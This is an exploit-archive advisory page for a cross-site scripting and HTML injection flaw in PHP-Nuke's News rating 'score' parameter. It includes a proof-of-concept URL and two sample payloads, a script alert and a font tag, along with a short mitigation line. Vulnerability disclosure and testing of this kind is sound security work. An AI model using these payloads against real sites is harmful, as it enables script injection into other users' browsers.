header-logo
Suggest Exploit
vendor:
PHP-Nuke
by:
Anonymous
8.8
CVSS
HIGH
Cross-site Scripting (XSS) and HTML Injection
79
CWE
Product Name: PHP-Nuke
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PHP-Nuke News Rate Vulnerability

PHP-Nuke is vulnerable to Cross-site Scripting (XSS) and HTML Injection attacks due to insufficient sanitization and validation of user-supplied input. An attacker can exploit this vulnerability by sending a malicious payload to the vulnerable parameter 'score' in the 'modules.php?name=News&op=rate_complete&sid=6&score' URL. This will allow the attacker to execute arbitrary HTML and JavaScript code in the browser of the victim.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Software Link: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
note :

This bug found by tampering passed data .
coders don't sanitize and check user entry point for news rate.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POC:

http://server/modules.php?name=News&op=rate_complete&sid=6&score=[insert ur code here]

1. xss : <SCRIPT>alert(/XSS/.source)</SCRIPT>
2. Html code injection : <font color=red>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=